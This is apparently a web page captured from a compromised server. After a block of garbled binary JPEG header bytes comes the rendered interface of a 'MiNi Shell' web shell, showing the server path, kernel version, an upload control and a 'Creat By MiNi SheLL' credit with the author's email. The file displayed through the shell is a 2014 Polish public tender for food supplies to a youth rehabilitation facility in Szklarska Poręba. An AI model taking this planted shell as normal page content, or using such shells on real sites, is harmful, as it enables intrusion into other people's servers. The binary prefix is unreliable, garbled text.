JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140206/43340-N-2014.html

<p class="kh_header"><b>Szklarska Poręba: Dostawa artykułów żywnościowych dla Zespołu Placówek Resocjalizacyjno - Wychowawczych w Szklarskiej Porębie</b><br>
<b>Numer ogłoszenia: 43340 - 2014; data zamieszczenia: 06.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Placówek Resocjalizacyjno-Wychowawczych , ul. Górna 29, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 075 7172769, faks 075 7174679.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zprw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowa samorzadowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Zespołu Placówek Resocjalizacyjno - Wychowawczych w Szklarskiej Porębie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w prowadzonym postępowaniu o udzielenie zamówienia publicznego jest dostawa artykułów żywnościowych dla Zespołu Placówek Resocjalizacyjno - Wychowawczych w Szklarskiej Porębie przy ul. Górnej 29, z podziałem na 3 części.
Część I  - dostawa nabiału i przetworów mlecznych
Część II - dostawa produktów spożywczych, przypraw , napojów i przetworów   
                warzywno-owocowych
Część III - dostawa jaj.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.50.00.00-3, 15.98.00.00-1, 15.33.00.00-0, 15.84.20.00-2, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wymaga ww zakresie innych oświadczeń bądź dokumentów oprócz oswiadczenia o spełnieniu warunków udziału w postępowaniu.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wymaga ww zakresie innych oświadczeń bądź dokumentów oprócz oswiadczenia o spełnieniu warunków udziału w postępowaniu.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wymaga ww zakresie innych oświadczeń bądź dokumentów oprócz oswiadczenia o spełnieniu warunków udziału w postępowaniu.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wymaga ww zakresie innych oświadczeń bądź dokumentów oprócz oswiadczenia o spełnieniu warunków udziału w postępowaniu.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wymaga ww zakresie innych oświadczeń bądź dokumentów oprócz oswiadczenia o spełnieniu warunków udziału w postępowaniu.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Przewiduje się możliwość podwyższenia cen jednostkowych określonego produktu
w przypadku wzrostu cen na rynku. Ceny jednostkowe poszczególnych produktów mogą ulec podwyższeniu raz na kwartał, nie więcej jednak niż o wskaźnik wzrostu cen towarów i usług konsumpcyjnych za poprzedni kwartał publikowany w Monitorze Polskim (tzw. klauzula waloryzacyjna). Ceny zostaną podwyższone z pierwszym dniem miesiąca następującego po miesiącu, w którym złożono pismo wnioskujące o zmianę cen. 
2. Wyżej wymienione dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego. 
3. Jakiekolwiek zmiany niniejszej umowy wymagają zachowania formy pisemnej w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zprw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Placówek Resocjalizacyjno - Wychowawczych 
ul. Górna 29 
58-580 Szklarska Poręba.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2014 godzina 10:00, miejsce: Zespół Placówek Resocjalizacyjno - Wychowawczych 
ul. Górna 29 
58-580 Szklarska Poręba
Budynek Biura -Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa nabiału i przetworów mlecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 18%tł. opakowanie kubek 	kg	200
Śmietana 30%tł. opakowanie karton 	l	260
Mleko pełne  w proszku op. torba - folia	kg	200
tłuszcz roślinny do smarowaniao zawartości tł. 60%, op. kubek 	kg	300
tłuszcz roślinny do smarowania z dodatkiem tłuszczu mlecznego, op. kubek	kg	200
Ser topiony różne smaki/z dodatkami op. Kostka	kg	150
ser topiony  różne smaki/z dodatkami, op. plastry  	kg	100
ser topiony różne smaki/z dodatkami, op. krążek (trójkąty)	kg	100
Ser żółty twardy łagodny , kl.I, zawartość tł.mlecznego nie mniej niż 45% typu gouda , 	kg	400
Ser żółty twardy łagodny , kl.I, zawartość tł.mlecznego nie mniej niż 45% typu morski  	kg	300
Ser żółty twardy łagodny , kl.I, zawartość tł.mlecznego nie mniej niż 45% typu podlaski  	kg	300
Twaróg świeży półtłusty op. Kostka	kg	400
serek ziarnisty typu wiejski op. Kubek	kg	60
ser biały twarogowy sernikowy, op. wiaderko 	kg	160
mix mleczny z dodatkiem oleju zaw. tłuszczu mlecznego minimum 50%, op. Kostka	kg	350
Margaryna do pieczenia i smażenia, twarda, o zawartości tł. 80%, op. kostka	kg	180
Masło bez dodatku oleju  roślinnego o zawartości tłuszczu mlecznego  76%-82%, op. kostka 	kg	200
Serek homogenizowany owocowy, różne smaki, op. kubek 	kg	645
Kefir  naturalny op. Kubek	kg	330
Serek twarogowy ziarnisty ze śmietaną, zaw. tłuszczu nie mniej niż 6%, op. Kubek 	kg	140
Jogurt owocowy, różne smaki, zawartość tł. 8%, op. Kubek 	kg	330
Mleko UHT 3,2% tł., opakowanie karton	l	120
serek twarogowy  typu fromage op.kostka	kg	120
ser  mozzarella (kulka)	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa produktów spożywczych, przypraw , napojów i przetworów ,warzywno-owocowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier biały	kg	1500
Cukier waniliowy 	kg	2,5
Cynamon	kg	0,5
Herbata granulowana 	kg	180
herbata czarna, ekspresowa, op. torebki 2g  ze sznurkiem 	kg	2
herbata ekspresowa mięta	kg	0,5
Kakao naturalne	kg	15
Ryż biały długoziarnisty	kg	400
Kasza jęczmienna gruba	kg	400
Kasza manna	kg	80
Ketchup łagodny pikantny	kg	150
Kwasek cytrynowy	kg	2,5
Liść laurowy	kg	1
Majeranek	kg	2,5
Majonez op. Słoik	l	200
Makaron świderki	kg	500
Makaron nitki	kg	150
Makaron zacierka	kg	150
Makaron łazanka	kg	220
makaron kolanka	kg	150
Mąka pszenna typ 405 450 - tortowa	kg	350
Mąka ziemniaczana	kg	80
Mąka pszenna Typ 500 650	kg	550
Proszek do pieczenia 	kg	1,2
Musztarda 	kg	240
Ocet 	l	25
Olej roślinny	l	150
Olej roślinny	l	300
Oregano	kg	2
Papryka ostra mielona	kg	3
Pieprz mielony czarny	kg	15
Pieprz ziołowy mielony 	kg	2
Czosnek mielony	kg	5
Ziele angielskie	kg	1
Przyprawa do zup w płynie uniwersalna typu magi	l	40
Przyprawa warzywna typu kucharek	kg	60
Papryka słodka mielona	kg	3
Płatki kukurydziane śniadaniowe 	kg	80
Płatki kukurydziane śniadaniowe kakaowe	kg	40
Płatki kukurydziane z miodem	kg	40
Płatki owsiane 	kg	30
Syrop owocowy o smaku czarnej porzeczki	l	30
Syrop owocowy o smaku  wiśniowym 	l	50
Syrop owocowy o smaku  żurawinowym 	l	30
Syrop owocowy o smaku  truskawkowym 	l	50
syrop owocowy o smaku  malinowym	l	30
Kisiel owocowy, różne smaki    	kg	8
Sól jodowana	kg	400
sól do przetworów	kg	80
Zupa barszcz biały	kg	10
Zupa barszcz czerwony	kg	10
Zupa żurek	kg	5
Sos boloński 	kg	10
Cukier puder	kg	20
Kawa zbożowa rozpuszczalna 	kg	6
Miód naturalny, op. słoik	kg	5
Dżem owocowy, różne smaki, op. wiaderko	kg	800
dżem owocowy, różne smaki, op. słoik 	kg	160
Czekolada pełnomleczna 	szt.	200
Baton typu snicers	kg	12
Cukierki galaretka owocowa w czekoladzie	kg	10
Cukierki mieszanka czekoladowa	kg	10
Czekolada pełnomleczna z bakaliami 	szt.	200
Wafelki w czekoladzie 	kg	6
kasza gryczana	kg	30
Brzoskwinie op. Puszka 	kg	10
Krem do tortów, różne smaki  	kg	3
makaron w formie ryżu z mąki pszennej	kg	15
makaron spaghetti 	kg	120
budyń, różne smaki  	kg	40
żelatyna 	kg	3
galaretka owocowa, różne smaki  	kg	2
Masa makowa op. puszka   	kg	6
Rodzynki 	kg	2
soda oczyszczona	kg	0,6
Fasola konserwowa szparagowa	szt.	150
Kukurydza konserwowa op. puszka 	szt.	150
Ogórek konserwowy 	szt.	400
Chrzan tarty, op. słoik 	kg	30
Groszek konserwowy op. Puszka	szt.	150
Przecier ogórkowy op. słoik	kg	80
Koncentrat pomidorowy 30 - opakowanie słoik 	kg	100
Groszek konserwowy 	szt.	20
 Ogórek kiszony słoik	kg	100
Szczaw konserwowy op. słoik	kg	50
Papryka konserwowa op. słoik	kg	100
Kompot wiśniowy op. słoik	l	150
Kompot czarna porzeczka op. słoik	l	150
Kompot truskawkowy op. słoik	l	300
kompot śliwka op. słoik	l	150
sok pomarańczowy 100 pr, op. karton	l	20
sok owocowy multiwitamina, op. karton	l	20
napój gazowany oranżada, op. PET	l	45
napój gazowany cola, op. PET	l	45
woda mineralna gazowana, op. PET	l	150
woda mineralna niegazowana, op. PET 	l	54
Groch łuskany  połówki	kg	100
Fasola biała sucha Jaś duży	kg	190
Kapusta kiszona, op. wiaderko	kg	200
kapusta kiszona, op. folia	kg	70
Mieszanka warzywna - marchew z groszkiem, op. słoik 	l	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8, 15.98.00.00-1, 15.33.00.00-0, 15.84.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze, konsumpcyjne,  Klasa A, waga L, op. wytłaczanka	szt.	12.000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com